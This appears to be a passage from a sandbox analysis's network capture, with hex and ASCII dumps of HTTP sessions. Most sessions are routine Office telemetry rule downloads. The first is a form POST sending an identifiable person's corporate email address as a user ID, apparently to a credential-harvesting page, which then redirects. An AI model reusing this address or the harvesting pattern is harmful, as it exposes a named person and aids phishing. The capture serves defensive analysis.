                                                                                                                                    2024-11-05 08:03:01 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 55 42 66 45 41 33 62 4a 43 43 50 6a 33 4a 7a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 55 42 66 45 41 33 62 4a 43 43 50 6a 33 4a 7a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 55 42 66 45 41 33 62 4a 43 43 50 6a 33 4a 7a
                                                                                                                                    Data Ascii: ------WebKitFormBoundaryUBfEA3bJCCPj3Jz9Content-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryUBfEA3bJCCPj3Jz9Content-Disposition: form-data; name="userpwd"------WebKitFormBoundaryUBfEA3bJCCPj3Jz
                                                                                                                                    2024-11-05 08:03:01 UTC824INHTTP/1.1 302 Found
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    location: http://googleweblight.com/i?u=google.com
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5TOGMF0UfgrZaLDafX%2FlOoxptkzi%2FzvEiV3yNQCAsgASuhVipLQ%2BEniJq0sfml5QLsI%2FxwJ6Y84BLa2HbwFs%2B1gCcvnzocu81Zuwy%2FYeq5qlmpW%2B6P6S0HLXZO1aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb532f2b02479d-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1565&delivery_rate=2401326&cwnd=241&unsent_bytes=0&cid=3da2c27fb0ae027a&ts=457&x=0"
                                                                                                                                    2024-11-05 08:03:01 UTC84INData Raw: 34 65 0d 0a 3c 62 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 54 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 0d 0a
                                                                                                                                    Data Ascii: 4e<br><h1>404 Not Found</h1>The page that you have requested could not be found.
                                                                                                                                    2024-11-05 08:03:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    10192.168.2.44977213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:09 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:10 UTC471INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:10 GMT
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Content-Length: 218853
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Cache-Control: public
                                                                                                                                    Last-Modified: Sun, 03 Nov 2024 10:28:28 GMT
                                                                                                                                    ETag: "0x8DCFBF241C15278"
                                                                                                                                    x-ms-request-id: bcb504eb-401e-0035-19e9-2d82d8000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080310Z-157b9fd754fk82tlhC1SN1x7tg000000049g000000000vae
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:10 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                    2024-11-05 08:03:10 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                    2024-11-05 08:03:11 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                    2024-11-05 08:03:11 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                    2024-11-05 08:03:11 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    11192.168.2.44977513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:12 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:12 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 2980
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                    x-ms-request-id: 23b843a5-001e-0065-686a-2e0b73000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080312Z-158dbd74bf4tfjlhhC1SN1m37400000003s0000000001e9v
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:12 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    12192.168.2.44977713.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:12 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:12 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 408
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                    x-ms-request-id: 281ea711-401e-0047-215f-2e8597000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080312Z-158dbd74bf4cvrq6hC1SN1zhyc00000003g0000000005ffu
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:12 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    13192.168.2.44977413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:12 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:12 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 450
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                    x-ms-request-id: 5dfad506-901e-0029-2a46-2e274a000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080312Z-158dbd74bf4rjfxfhC1SN1a43800000003k0000000005nqp
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:12 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    14192.168.2.44977313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:12 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:12 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 3788
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                    x-ms-request-id: ece73ca0-101e-007a-073f-2e047e000000
                                                                                                                                    x-ms-version: 2018-03-28
